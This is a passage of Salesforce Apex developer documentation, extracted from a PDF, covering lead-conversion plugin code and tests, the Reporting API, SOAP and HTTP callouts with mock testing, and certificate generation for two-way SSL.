Boolean sendEmailToOwner
) {
Map<String,String> result = new Map<String,String>();
if (leadId == null) throw new ConvertLeadPluginException(
'Lead Id cannot be null');
// check for multiple leads with the same ID
Lead[] leads = [Select Id, FirstName, LastName, Company
From Lead where Id = :leadID];
if (leads.size() > 0) {
Lead l = leads[0];
// CheckAccount = true, checkContact = false
if (accountID == null && l.Company != null) {
Account[] accounts = [Select Id, Name FROM Account
where Name = :l.Company LIMIT 1];
if (accounts.size() > 0) {
accountId = accounts[0].id;
}
}
// Perform the lead conversion.
Database.LeadConvert lc = new Database.LeadConvert();
lc.setLeadId(leadID);
lc.setOverwriteLeadSource(overWriteLeadSource);
lc.setDoNotCreateOpportunity(!createOpportunity);
lc.setConvertedStatus(convertedStatus);
if (sendEmailToOwner != null) lc.setSendNotificationEmail(
sendEmailToOwner);
if (accountId != null && accountId.length() > 0)
lc.setAccountId(accountId);
if (contactId != null && contactId.length() > 0)
lc.setContactId(contactId);
if (createOpportunity) {
lc.setOpportunityName(opportunityName);
}
Database.LeadConvertResult lcr = Database.convertLead(
lc, true);
if (lcr.isSuccess()) {
result.put('AccountID', lcr.getAccountId());
result.put('ContactID', lcr.getContactId());
if (createOpportunity) {
result.put('OpportunityID',
lcr.getOpportunityId());
316
}
} else {
String error = lcr.getErrors()[0].getMessage();
throw new ConvertLeadPluginException(error);
}
} else {
throw new ConvertLeadPluginException(
'No leads found with Id : "' + leadId + '"');
}
return result;
}
// Utility exception class
class ConvertLeadPluginException extends Exception {}
}
// Test class for the lead convert Apex plug-in.
@isTest
private class VWFConvertLeadTest {
static testMethod void basicTest() {
// Create test lead
Lead testLead = new Lead(
Company='Test Lead',FirstName='John',LastName='Doe');
insert testLead;
LeadStatus convertStatus =
[Select Id, MasterLabel from LeadStatus
where IsConverted=true limit 1];
// Create test conversion
VWFConvertLead aLeadPlugin = new VWFConvertLead();
Map<String,Object> inputParams = new Map<String,Object>();
Map<String,Object> outputParams = new Map<String,Object>();
inputParams.put('LeadID',testLead.ID);
inputParams.put('ConvertedStatus',
convertStatus.MasterLabel);
Process.PluginRequest request = new
Process.PluginRequest(inputParams);
Process.PluginResult result;
result = aLeadPlugin.invoke(request);
Lead aLead = [select name, id, isConverted
from Lead where id = :testLead.ID];
System.Assert(aLead.isConverted);
}
/*
* This tests lead conversion with
* the Account ID specified.
*/
static testMethod void basicTestwithAccount() {
317
318
/*
* -ve Test
*/
static testMethod void errorTest() {
// Create test lead
// Lead testLead = new Lead(Company='Test Lead',
//
FirstName='John',LastName='Doe');
LeadStatus convertStatus = [Select Id, MasterLabel
from LeadStatus where IsConverted=true limit 1];
// Create test conversion
VWFConvertLead aLeadPlugin = new VWFConvertLead();
Map<String,Object> inputParams = new Map<String,Object>();
Map<String,Object> outputParams = new Map<String,Object>();
inputParams.put('LeadID','00Q7XXXXxxxxxxx');
inputParams.put('ConvertedStatus',convertStatus.MasterLabel);
Process.PluginRequest request = new
Process.PluginRequest(inputParams);
Process.PluginResult result;
try {
result = aLeadPlugin.invoke(request);
}
catch (Exception e) {
System.debug('EXCEPTION' + e);
System.AssertEquals(1,1);
}
}
319
Communities
/*
* This tests the describe() method
*/
static testMethod void describeTest() {
VWFConvertLead aLeadPlugin =
new VWFConvertLead();
Process.PluginDescribeResult result =
aLeadPlugin.describe();
System.AssertEquals(
result.inputParameters.size(), 8);
System.AssertEquals(
result.OutputParameters.size(), 3);
}
}
Communities
Communities are branded spaces for your employees, customers, and partners to connect. You can interact with communities in Apex
using the Network class and using Chatter in Apex classes in the ConnectApi namespace.
Chatter in Apex has a ConnectApi.Communities class with methods that return information about communities. Also, most
Chatter in Apex methods take a communityId argument.
SEE ALSO:
Network Class
Zones
Note: Before Summer 13, Chatter Answers and Ideas used the term communities. In the Summer 13 release, these communities
were renamed zones to prevent confusion with Salesforce Communities.
Zones help organize ideas and answers into logical groups with each zone having its own focus and unique ideas and answers topics.
Apex includes the Answers, Ideas, and ConnectApi.Zones classes that allow you to work with zones.
SEE ALSO:
Answers Class
Ideas Class
Zones Class
320
321
322
Run Reports
The API can process only reports that contain up to 100 fields selected as columns.
A list of up to 200 recently viewed reports can be returned.
Your organization can request up to 500 synchronous report runs per hour.
The API supports up to 20 synchronous report run requests at a time.
A list of up to 2,000 instances of a report that was run asynchronously can be returned.
The API supports up to 200 requests at a time to get results of asynchronous report runs.
Your organization can request up to 1,200 asynchronous requests per hour.
Asynchronous report run results are available within a 24-hour rolling period.
The API returns up to the first 2,000 report rows. You can narrow results using filters.
You can add up to 20 custom field filters when you run a report.
In addition, the following restrictions apply to the Salesforce1 Reporting API via Apex.
Asynchronous report calls are not allowed in batch Apex.
Report calls are not allowed in Apex triggers.
There is no Apex method to list recently run reports.
The number of report rows processed during a synchronous report run count towards the governor limit that restricts the total
number of rows retrieved by SOQL queries to 50,000 rows per transaction. This limit is not imposed when reports are run
asynchronously.
In Apex tests, report runs always ignore the SeeAllData annotation, regardless of whether the annotation is set to true or
false. This means that report results will include pre-existing data that the test didnt create. There is no way to disable the
SeeAllData annotation for a report execution. To limit results, use a filter on the report.
In Apex tests, asynchronous report runs will execute only after the test is stopped using the Test.stopTest method.
Note: All limits that apply to reports created in the report builder also apply to the API. For more information, see Analytics Limits
in the Salesforce online help.
Run Reports
You can run a report synchronously or asynchronously through the Salesforce1 Reporting API via Apex.
Reports can be run with or without details and can be filtered by setting report metadata. When you run a report, the API returns data
for the same number of records that are available when the report is run in the Salesforce user interface.
Run a report synchronously if you expect it to finish running quickly. Otherwise, we recommend that you run reports through the
Salesforce API asynchronously for these reasons:
Long-running reports have a lower risk of reaching the timeout limit when they are run asynchronously.
The two-minute overall Salesforce API timeout limit doesnt apply to asynchronous runs.
The Salesforce1 Reporting API can handle a higher number of asynchronous run requests at a time.
Because the results of an asynchronously run report are stored for a 24-hour rolling period, theyre available for recurring access.
Example: Run a Report Synchronously
To run a report synchronously, use one of the ReportManager.runReport() methods. For example:
// Get the report ID
List <Report> reportList = [SELECT Id,DeveloperName FROM Report where
DeveloperName = 'Closed_Sales_This_Quarter'];
String reportId = (String)reportList.get(0).get('Id');
323
324
325
Filter Reports
Filter Reports
To get specific results on the fly, you can filter reports through the API.
Changes to filters that are made through the API dont affect the source report definition. Using the API, you can filter with up to 20
custom field filters and add filter logic (such as AND and OR). But standard filters (such as range), filtering by row limit, and cross filters
are unavailable.
Before you filter a report, its helpful to check the following filter values in the metadata.
The ReportTypeColumn.getFilterable method tells you whether a field can be filtered.
The ReportTypeColumn.filterValues method returns all filter values for a field.
The ReportManager.dataTypeFilterOperatorMap method lists the field data types that you can use to filter the
report.
The ReportMetadata.getReportFilters method lists all filters that exist in the report.
You can filter reports during synchronous or asynchronous report runs.
Example: To filter a report, set filter values in the report metadata and then run the report. The following example retrieves the
report metadata, overrides the filter value, and runs the report. The example:
1. Retrieves the report filter object from the metadata by using the ReportMetadata.getReportFilters method.
2. Sets the value in the filter to a specific date by using the ReportFilter.setValue method and runs the report.
326
3. Overrides the filter value to a different date and runs the report again.
The output for the example shows the differing grand total values, based on the date filter that was applied.
// Get the report ID
List <Report> reportList = [SELECT Id,DeveloperName FROM Report where
DeveloperName = 'Closed_Sales_This_Quarter'];
String reportId = (String)reportList.get(0).get('Id');
// Get the report metadata
Reports.ReportDescribeResult describe = Reports.ReportManager.describeReport(reportId);
Reports.ReportMetadata reportMd = describe.getReportMetadata();
// Override filter and run report
Reports.ReportFilter filter = reportMd.getReportFilters()[0];
filter.setValue('2013-11-01');
Reports.ReportResults results = Reports.ReportManager.runReport(reportId, reportMd);
Reports.ReportFactWithSummaries factSum =
(Reports.ReportFactWithSummaries)results.getFactMap().get('T!T');
System.debug('Value for November: ' + factSum.getAggregates()[0].getLabel());
// Override filter and run report
filter = reportMd.getReportFilters()[0];
filter.setValue('2013-10-01');
results = Reports.ReportManager.runReport(reportId, reportMd);
factSum = (Reports.ReportFactWithSummaries)results.getFactMap().get('T!T');
System.debug('Value for October: ' + factSum.getAggregates()[0].getLabel());
Tabular
T!T: The grand total of a report. Both record data values and the grand total are represented by this key.
Summary
Matrix
Each item in a row or column grouping is numbered starting with 0. Here are some examples of fact map keys:
327
Fact Map
Key
Description
0!T
1!T
0_0!T
The first item in the first-level grouping and the first item in the second-level grouping.
0_1!T
The first item in the first-level grouping and the second item in the second-level grouping.
Lets look at examples of how fact map keys represent data as it appears in a Salesforce tabular, summary, or matrix report.
328
Test Reports
Description
0!T
1_0!T
Summary of the probabilities for the Manufacturing opportunities in the Needs Analysis stage.
Description
0!0
0_0!0_0
Total opportunity amount in the Prospecting stage in the Manufacturing sector in October 2010.
2_1!1_1
Total value of opportunities in the Value Proposition stage in the Technology sector in February 2011.
T!T
Test Reports
Like all Apex code, Salesforce1 Reporting API via Apex code requires test coverage.
329
Test Reports
The Reporting Apex methods dont run in system mode, they run in the context of the current user (also called the context user or the
logged-in user). The methods have access to whatever the current user has access to.
In Apex tests, report runs always ignore the SeeAllData annotation, regardless of whether the annotation is set to true or false.
This means that report results will include pre-existing data that the test didnt create. There is no way to disable the SeeAllData
annotation for a report execution. To limit results, use a filter on the report.
Example: Create a Reports Test Class
The following example tests asynchronous and synchronous reports. Each method:
Creates a new Opportunity object and uses it to set a filter on the report.
Runs the report.
Calls assertions to validate the data.
Note: In Apex tests, asynchronous reports execute only after the test is stopped using the Test.stopTest method.
@isTest
public class ReportsInApexTest{
@isTest(SeeAllData='true')
public static void testAsyncReportWithTestData() {
List <Report> reportList = [SELECT Id,DeveloperName FROM Report where
DeveloperName = 'Closed_Sales_This_Quarter'];
String reportId = (String)reportList.get(0).get('Id');
// Create an Opportunity object.
Opportunity opp = new Opportunity(Name='ApexTestOpp', StageName='stage',
Probability = 95, CloseDate=system.today());
insert opp;
Reports.ReportMetadata reportMetadata =
Reports.ReportManager.describeReport(reportId).getReportMetadata();
// Add a filter.
List<Reports.ReportFilter> filters = new List<Reports.ReportFilter>();
Reports.ReportFilter newFilter = new Reports.ReportFilter();
newFilter.setColumn('OPPORTUNITY_NAME');
newFilter.setOperator('equals');
newFilter.setValue('ApexTestOpp');
filters.add(newFilter);
reportMetadata.setReportFilters(filters);
Test.startTest();
Reports.ReportInstance instanceObj =
Reports.ReportManager.runAsyncReport(reportId,reportMetadata,false);
String instanceId = instanceObj.getId();
// Report instance is not available yet.
Test.stopTest();
// After the stopTest method, the report has finished executing
// and the instance is available.
330
Test Reports
instanceObj = Reports.ReportManager.getReportInstance(instanceId);
System.assertEquals(instanceObj.getStatus(),'Success');
Reports.ReportResults result = instanceObj.getReportResults();
Reports.ReportFact grandTotal = (Reports.ReportFact)result.getFactMap().get('T!T');
System.assertEquals(1,(Decimal)grandTotal.getAggregates().get(1).getValue());
}
@isTest(SeeAllData='true')
public static void testSyncReportWithTestData() {
// Create an Opportunity Object.
Opportunity opp = new Opportunity(Name='ApexTestOpp', StageName='stage',
Probability = 95, CloseDate=system.today());
insert opp;
List <Report> reportList = [SELECT Id,DeveloperName FROM Report where
DeveloperName = 'Closed_Sales_This_Quarter'];
String reportId = (String)reportList.get(0).get('Id');
Reports.ReportMetadata reportMetadata =
Reports.ReportManager.describeReport(reportId).getReportMetadata();
// Add a filter.
List<Reports.ReportFilter> filters = new List<Reports.ReportFilter>();
Reports.ReportFilter newFilter = new Reports.ReportFilter();
newFilter.setColumn('OPPORTUNITY_NAME');
newFilter.setOperator('equals');
newFilter.setValue('ApexTestOpp');
filters.add(newFilter);
reportMetadata.setReportFilters(filters);
Reports.ReportResults result =
Reports.ReportManager.runReport(reportId,reportMetadata,false);
Reports.ReportFact grandTotal = (Reports.ReportFact)result.getFactMap().get('T!T');
System.assertEquals(1,(Decimal)grandTotal.getAggregates().get(1).getValue());
}
}
331
Invoking Callouts
Using Apex
JSON Support
XML Support
Apex allows you to integrate with external SOAP and REST Web services using callouts. Various utilities
are provided for use with callouts. These are utilities for JSON, XML, data security, and encoding. Also, a
general purpose utility for regular expressions with text strings is provided.
332
333
334
The value of outputHttpHeaders_x is null by default. You must set outputHttpHeaders_x before you have access to the
content of headers in the response.
335
Apex Type
xsd:anyURI
String
xsd:boolean
Boolean
xsd:date
Date
xsd:dateTime
Datetime
xsd:double
Double
xsd:float
Double
xsd:int
Integer
xsd:integer
Integer
xsd:language
String
xsd:long
Long
xsd:Name
String
xsd:NCName
String
xsd:nonNegativeInteger Integer
xsd:NMTOKEN
String
xsd:NMTOKENS
String
xsd:normalizedString
String
xsd:NOTATION
String
xsd:positiveInteger
Integer
xsd:QName
String
xsd:short
Integer
xsd:string
String
xsd:time
Datetime
xsd:token
String
xsd:unsignedInt
Integer
xsd:unsignedLong
Long
xsd:unsignedShort
Integer
336
Note: The Salesforce datatype anyType is not supported in WSDLs used to generate Apex code that is saved using API version
15.0 and later. For code saved using API version 14.0 and earlier, anyType is mapped to String.
Apex also supports the following schema constructs:
xsd:all, in Apex code saved using API version 15.0 and later
xsd:annotation, in Apex code saved using API version 15.0 and later
xsd:attribute, in Apex code saved using API version 15.0 and later
xsd:choice, in Apex code saved using API version 15.0 and later
xsd:element. In Apex code saved using API version 15.0 and later, the ref attribute is also supported with the following
restrictions:
You cannot call a ref in a different namespace.
A global element cannot use ref.
If an element contains ref, it cannot also contain name or type.
xsd:sequence
The following data types are only supported when used as call ins, that is, when an external Web service calls an Apex Web service
method. These data types are not supported as callouts, that is, when an Apex Web service method calls an external Web service.
blob
decimal
enum
Apex does not support any other WSDL constructs, types, or services, including:
RPC/encoded services
WSDL files with mulitple portTypes, multiple services, or multiple bindings
WSDL files that import external schemas. For example, the following WSDL fragment imports an external schema, which is not
supported:
<wsdl:types>
<xsd:schema
elementFormDefault="qualified"
targetNamespace="http://s3.amazonaws.com/doc/2006-03-01/">
<xsd:include schemaLocation="AmazonS3.xsd"/>
</xsd:schema>
</wsdl:types>
However, an import within the same schema is supported. In the following example, the external WSDL is pasted into the WSDL
you are converting:
<wsdl:types>
<xsd:schema
xmlns:tns="http://s3.amazonaws.com/doc/2006-03-01/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
elementFormDefault="qualified"
targetNamespace="http://s3.amazonaws.com/doc/2006-03-01/">
<xsd:element name="CreateBucket">
<xsd:complexType>
<xsd:sequence>
[...]
337
</xsd:schema>
</wsdl:types>
This modified version wraps the simpleType element as a complexType that contains a sequence of elements. This follows
the document literal style and is supported.
<wsdl:types>
<xsd:schema targetNamespace="http://test.org/AccountPollInterface/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<xsd:element name="SFDCPollAccountsResponse" type="tns:SFDCPollResponse" />
<xsd:complexType name="SFDCPollResponse">
<xsd:sequence>
<xsd:element name="SFDCOutput" type="xsd:string" />
</xsd:sequence>
</xsd:complexType>
</xsd:schema>
</wsdl:types>
IN THIS SECTION:
1. Understanding the Generated Code
2. Testing Web Service Callouts
3. Performing DML Operations and Mock Callouts
4. Considerations Using WSDLs
338
xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">
<!-- Above, the schema targetNamespace maps to the Apex class name. -->
<!-- Below, the type definitions for the parameters are listed.
Each complexType and simpleType parameteris mapped to an Apex class inside the parent
class for the WSDL. Then, each element in the complexType is mapped to a public field
inside the class. -->
<wsdl:types>
<s:schema elementFormDefault="qualified"
targetNamespace="http://doc.sample.com/docSample">
<s:element name="EchoString">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="input" type="s:string" />
</s:sequence>
</s:complexType>
</s:element>
<s:element name="EchoStringResponse">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="EchoStringResult"
type="s:string" />
</s:sequence>
</s:complexType>
</s:element>
</s:schema>
</wsdl:types>
<!--The stub below defines operations. -->
<wsdl:message name="EchoStringSoapIn">
<wsdl:part name="parameters" element="tns:EchoString" />
</wsdl:message>
<wsdl:message name="EchoStringSoapOut">
<wsdl:part name="parameters" element="tns:EchoStringResponse" />
</wsdl:message>
<wsdl:portType name="DocSamplePortType">
<wsdl:operation name="EchoString">
<wsdl:input message="tns:EchoStringSoapIn" />
<wsdl:output message="tns:EchoStringSoapOut" />
</wsdl:operation>
</wsdl:portType>
<!--The code below defines how the types map to SOAP. -->
<wsdl:binding name="DocSampleBinding" type="tns:DocSamplePortType">
<wsdl:operation name="EchoString">
<soap:operation soapAction="urn:dotnet.callouttest.soap.sforce.com/EchoString"
style="document" />
<wsdl:input>
<soap:body use="literal" />
339
</wsdl:input>
<wsdl:output>
<soap:body use="literal" />
</wsdl:output>
</wsdl:operation>
</wsdl:binding>
<!-- Finally, the code below defines the endpoint, which maps to the endpoint in the class
-->
<wsdl:service name="DocSample">
<wsdl:port name="DocSamplePort" binding="tns:DocSampleBinding">
<soap:address location="http://YourServer/YourService" />
</wsdl:port>
</wsdl:service>
</wsdl:definitions>
From this WSDL document, the following Apex class is auto-generated. The class name docSample is the name you specify when
importing the WSDL.
//Generated by wsdl2apex
public class docSample {
public class EchoStringResponse_element {
public String EchoStringResult;
private String[] EchoStringResult_type_info = new String[]{
'EchoStringResult',
'http://www.w3.org/2001/XMLSchema',
'string','0','1','false'};
private String[] apex_schema_type_info = new String[]{
'http://doc.sample.com/docSample',
'true'};
private String[] field_order_type_info = new String[]{
'EchoStringResult'};
}
public class DocSamplePort {
public String endpoint_x = 'http://YourServer/YourService';
private String[] ns_map_type_info = new String[]{
'http://doc.sample.com/docSample',
'docSample'};
public String EchoString(String input) {
docSample.EchoString_element request_x =
new docSample.EchoString_element();
docSample.EchoStringResponse_element response_x;
request_x.input = input;
340
341
being skipped and to increase code coverage, Apex provides the built-in WebServiceMock interface and the Test.setMock
method that you can use to receive fake responses in a test method.
Note:
The class implementing the WebServiceMock interface can be either global or public.
You can annotate this class with @isTest since it will be used only in test context. In this way, you can exclude it from your
organizations code size limit of 3 MB.
Now that you have specified the values of the fake response, instruct the Apex runtime to send this fake response by calling
Test.setMock in your test method. For the first argument, pass WebServiceMock.class, and for the second argument,
pass a new instance of your interface implementation of WebServiceMock, as follows:
Test.setMock(WebServiceMock.class, new YourWebServiceMockImpl());
After this point, if a Web service callout is invoked in test context, the callout is not made and you receive the mock response specified
in your doInvoke method implementation.
Note: If the code that performs the callout is in a managed package, you must call Test.setMock from a test method in the
same package with the same namespace to mock the callout.
This is a full example that shows how to test a Web service callout. The implementation of the WebServiceMock interface is listed
first. This example implements the doInvoke method, which returns the response you specify. In this case, the response element of
the auto-generated class is created and assigned a value. Next, the response Map parameter is populated with this fake response. This
342
example is based on the WSDL listed in Understanding the Generated Code. Import this WSDL and generate a class called docSample
before you save this class.
@isTest
global class WebServiceMockImpl implements WebServiceMock {
global void doInvoke(
Object stub,
Object request,
Map<String, Object> response,
String endpoint,
String soapAction,
String requestName,
String responseNS,
String responseName,
String responseType) {
docSample.EchoStringResponse_element respElement =
new docSample.EchoStringResponse_element();
respElement.EchoStringResult = 'Mock response';
response.put('response_x', respElement);
}
}
This is the test class containing the test method that sets the mock callout mode. It calls the callEchoString method in the
previous class and verifies that a mock response is received.
@isTest
private class WebSvcCalloutTest {
@isTest static void testEchoString() {
// This causes a fake response to be generated
Test.setMock(WebServiceMock.class, new WebServiceMockImpl());
// Call the method that invokes a callout
String output = WebSvcCallout.callEchoString('Hello World!');
// Verify that a fake result is returned
System.assertEquals('Mock response', output);
}
}
SEE ALSO:
WebServiceMock Interface
343
344
Follow the same rules as with DML calls: Enclose the portion of your code that performs the callout within Test.startTest
and Test.stopTest statements. The Test.startTest statement must appear before the Test.setMock statement.
Also, the asynchronous calls must not be part of the Test.startTest/Test.stopTest block.
MyClass.asyncCall();
Test.startTest();
Test.setMock(..); // Takes two arguments
MyClass.mockCallout();
Test.stopTest();
Asynchronous calls that occur after mock callouts are allowed and dont require any changes in test methods.
SEE ALSO:
Test Class
Mapping Headers
Headers defined in the WSDL document become public fields on the stub in the generated class. This is similar to how the AJAX Toolkit
and .NET works.
345
If the last character of an element name is not allowed in an Apex variable name, an x character is appended to the generated Apex
variable name.
If an element name contains a character that is not allowed in an Apex variable name, the character is replaced with an underscore
(_) character.
If an element name contains two characters in a row that are not allowed in an Apex variable name, the first character is replaced
with an underscore (_) character and the second one is replaced with an x character. This avoids generating a variable name with
two successive underscores, which is not allowed in Apex.
Suppose you have an operation that takes two parameters, a_ and a_x. The generated Apex has two variables, both named a_x.
The class will not compile. You must manually edit the Apex and change one of the variable names.
HTTP Classes
These classes expose the general HTTP request/response functionality:
Http Class. Use this class to initiate an HTTP request and response.
HttpRequest Class: Use this class to programmatically create HTTP requests like GET, POST, PUT, and DELETE.
HttpResponse Class: Use this class to handle the HTTP response returned by HTTP.
The HttpRequest and HttpResponse classes support the following elements:
HttpRequest:
HTTP request types such as GET, POST, PUT, DELETE, TRACE, CONNECT, HEAD, and OPTIONS.
Request headers if needed.
Read and connection timeouts.
Redirects if needed.
Content of the message body.
HttpResponse:
346
The previous example runs synchronously, meaning no further processing happens until the external Web service returns a response.
Alternatively, you can use the @future annotation to make the callout run asynchronously.
Before you can access external servers from an endpoint or redirect endpoint using Apex or any other feature, you must add the remote
site to a list of authorized remote sites in the Salesforce user interface. To do this, log in to Salesforce and from Setup, click Security
Controls > Remote Site Settings.
Note: The AJAX proxy handles redirects and authentication challenges (401/407 responses) automatically. For more information
about the AJAX proxy, see AJAX Toolkit documentation.
Use the XML classes or JSON classes to parse XML or JSON content in the body of a request created by HttpRequest, or a response
accessed by HttpResponse.
347
Note:
The class that implements the HttpCalloutMock interface can be either global or public.
You can annotate this class with @isTest since it will be used only in test context. In this way, you can exclude it from your
organizations code size limit of 3 MB.
Now that you have specified the values of the fake response, instruct the Apex runtime to send this fake response by calling
Test.setMock in your test method. For the first argument, pass HttpCalloutMock.class, and for the second argument,
pass a new instance of your interface implementation of HttpCalloutMock, as follows:
Test.setMock(HttpCalloutMock.class, new YourHttpCalloutMockImpl());
After this point, if an HTTP callout is invoked in test context, the callout is not made and you receive the mock response you specified in
the respond method implementation.
Note: If the code that performs the callout is in a managed package, you must call Test.setMock from a test method in the
same package with the same namespace to mock the callout.
This is a full example that shows how to test an HTTP callout. The interface implementation (MockHttpResponseGenerator) is
listed first. It is followed by a class containing the test method and another containing the method that the test calls. The testCallout
test method sets the mock callout mode by calling Test.setMock before calling getInfoFromExternalService. It then
verifies that the response returned is what the implemented respond method sent. Save each class separately and run the test in
CalloutClassTest.
@isTest
global class MockHttpResponseGenerator implements HttpCalloutMock {
// Implement this interface method
global HTTPResponse respond(HTTPRequest req) {
// Optionally, only send a mock response for a specific endpoint
// and method.
System.assertEquals('http://api.salesforce.com/foo/bar', req.getEndpoint());
System.assertEquals('GET', req.getMethod());
// Create a fake response
HttpResponse res = new HttpResponse();
res.setHeader('Content-Type', 'application/json');
res.setBody('{"foo":"bar"}');
res.setStatusCode(200);
return res;
348
}
}
public class CalloutClass {
public static HttpResponse getInfoFromExternalService() {
HttpRequest req = new HttpRequest();
req.setEndpoint('http://api.salesforce.com/foo/bar');
req.setMethod('GET');
Http h = new Http();
HttpResponse res = h.send(req);
return res;
}
}
@isTest
private class CalloutClassTest {
@isTest static void testCallout() {
// Set mock callout class
Test.setMock(HttpCalloutMock.class, new MockHttpResponseGenerator());
// Call method to test.
// This causes a fake response to be sent
// from the class that implements HttpCalloutMock.
HttpResponse res = CalloutClass.getInfoFromExternalService();
// Verify response received contains fake values
String contentType = res.getHeader('Content-Type');
System.assert(contentType == 'application/json');
String actualValue = res.getBody();
String expectedValue = '{"foo":"bar"}';
System.assertEquals(actualValue, expectedValue);
System.assertEquals(200, res.getStatusCode());
}
}
SEE ALSO:
HttpCalloutMock Interface
Test Class
349
1. Create a text file that contains the response body to return. The response body can be an arbitrary string, but it must match the
content type, if specified. For example, if your response has no content type specified, the file can include the arbitrary string abc.
If you specify a content type of application/json for the response, the file content should be a JSON string, such as {"hah":"fooled
you"}.
2. Create a static resource for the text file:
a. Click Develop > Static Resources, and then New Static Resource.
b. Name your static resource.
c. Choose the file to upload.
d. Click Save.
To learn more about static resources, see Defining Static Resources in the Salesforce online help.
Next, create an instance of StaticResourceCalloutMock and set the static resource, and any other properties.
StaticResourceCalloutMock mock = new StaticResourceCalloutMock();
mock.setStaticResource('myStaticResourceName');
mock.setStatusCode(200);
mock.setHeader('Content-Type', 'application/json');
In your test method, call Test.setMock to set the mock callout mode and pass it HttpCalloutMock.class as the first
argument, and the variable name that you created for StaticResourceCalloutMock as the second argument.
Test.setMock(HttpCalloutMock.class, mock);
After this point, if your test method performs a callout, the callout is not made and the Apex runtime sends the mock response you
specified in your instance of StaticResourceCalloutMock.
Note: If the code that performs the callout is in a managed package, you must call Test.setMock from a test method in the
same package with the same namespace to mock the callout.
This is a full example containing the test method (testCalloutWithStaticResources) and the method it is testing
(getInfoFromExternalService) that performs the callout. Before running this example, create a static resource named
mockResponse based on a text file with the content {"hah":"fooled you"}. Save each class separately and run the test in
CalloutStaticClassTest.
public class CalloutStaticClass {
public static HttpResponse getInfoFromExternalService(String endpoint) {
HttpRequest req = new HttpRequest();
req.setEndpoint(endpoint);
req.setMethod('GET');
Http h = new Http();
HttpResponse res = h.send(req);
return res;
}
}
@isTest
private class CalloutStaticClassTest {
@isTest static void testCalloutWithStaticResources() {
// Use StaticResourceCalloutMock built-in class to
// specify fake response and include response body
// in a static resource.
StaticResourceCalloutMock mock = new StaticResourceCalloutMock();
mock.setStaticResource('mockResponse');
350
mock.setStatusCode(200);
mock.setHeader('Content-Type', 'application/json');
// Set the mock callout mode
Test.setMock(HttpCalloutMock.class, mock);
// Call the method that performs the callout
HTTPResponse res = CalloutStaticClass.getInfoFromExternalService(
'http://api.salesforce.com/foo/bar');
// Verify response received contains values returned by
// the mock response.
// This is the content of the static resource.
System.assertEquals('{"hah":"fooled you"}', res.getBody());
System.assertEquals(200,res.getStatusCode());
System.assertEquals('application/json', res.getHeader('Content-Type'));
}
}
In your test method, call Test.setMock to set the mock callout mode and pass it HttpCalloutMock.class as the first
argument, and the variable name that you created for MultiStaticResourceCalloutMock as the second argument.
Test.setMock(HttpCalloutMock.class, multimock);
After this point, if your test method performs an HTTP callout to one of the endpoints http://api.salesforce.com/foo/bar
or http://api.salesforce.com/foo/sfdc, the callout is not made and the Apex runtime sends the corresponding mock
response you specified in your instance of MultiStaticResourceCalloutMock.
This is a full example containing the test method (testCalloutWithMultipleStaticResources) and the method it is
testing (getInfoFromExternalService) that performs the callout. Before running this example, create a static resource named
mockResponse based on a text file with the content {"hah":"fooled you"} and another named mockResponse2
based on a text file with the content {"hah":"fooled you twice"}. Save each class separately and run the test in
CalloutMultiStaticClassTest.
public class CalloutMultiStaticClass {
public static HttpResponse getInfoFromExternalService(String endpoint) {
351
352
353
Using Certificates
Follow the same rules as with DML calls: Enclose the portion of your code that performs the callout within Test.startTest
and Test.stopTest statements. The Test.startTest statement must appear before the Test.setMock statement.
Also, the asynchronous calls must not be part of the Test.startTest/Test.stopTest block.
MyClass.asyncCall();
Test.startTest();
Test.setMock(..); // Takes two arguments
MyClass.mockCallout();
Test.stopTest();
Asynchronous calls that occur after mock callouts are allowed and dont require any changes in test methods.
SEE ALSO:
Test Class
Using Certificates
You can use two-way SSL authentication by sending a certificate generated in Salesforce or signed by a certificate authority (CA) with
your callout. This enhances security as the target of the callout receives the certificate and can use it to authenticate the request against
its keystore.
To enable two-way SSL authentication for a callout:
1. Generate a certificate.
2. Integrate the certificate with your code. See Using Certificates with SOAP Services and Using Certificates with HTTP Requests.
3. If you are connecting to a third-party and you are using a self-signed certificate, share the Salesforce certificate with them so that
they can add the certificate to their keystore. If you are connecting to another application used within your organization, configure
your Web or application server to request a client certificate. This process depends on the type of Web or application server you use.
For an example of how to set up two-way SSL with Apache Tomcat, see
developer.salesforce.com/page/Making_Authenticated_Web_Service_Callouts_Using_Two-Way_SSL.
4. Configure the remote site settings for the callout. Before any Apex callout can call an external site, that site must be registered in
the Remote Site Settings page, or the callout fails.
IN THIS SECTION:
1. Generating Certificates
2. Using Certificates with SOAP Services
3. Using Certificates with HTTP Requests
Generating Certificates
You can use a self-signed certificate generated in Salesforce or a certificate signed by a certificate authority (CA). To generate a certificate
for a callout:
1. From Setup, click Security Controls > Certificate and Key Management.
354
Using Certificates
2. Select either Create Self-Signed Certificate or Create CA-Signed Certificate, based on what kind of certificate your external
website accepts. You cant change the type of a certificate after youve created it.
3. Enter a descriptive label for the Salesforce certificate. This name is used primarily by administrators when viewing certificates.
4. Enter the Unique Name. This name is automatically populated based on the certificate label you enter. This name can contain
only underscores and alphanumeric characters, and must be unique in your organization. It must begin with a letter, not include
spaces, not end with an underscore, and not contain two consecutive underscores. Use the Unique Name when referring to the
certificate using the Force.com Web services API or Apex.
5. Select a Key Size for your generated certificate and keys. We recommend that you use the default key size of 2048 for security
reasons. Selecting 2048 generates a certificate using 2048-bit keys and is valid for two years. Selecting 1024 generates a certificate
using 1024-bit keys and is valid for one year.
Note: Once you save a Salesforce certificate, you cant change the key size.
6. If youre creating a CA-signed certificate, you must also enter the following information. These fields are joined together to generate
a unique certificate.
Field
Description
Common Name
Email Address
Company
Department
City
State
Country Code
7. Click Save.
After you successfully save a Salesforce certificate, the certificate and corresponding keys are automatically generated.
After you create a CA-signed certificate, you must upload the signed certificate before you can use it. See Uploading Certificate Authority
(CA)-Signed Certificates in the Salesforce online help.
355
Using Certificates
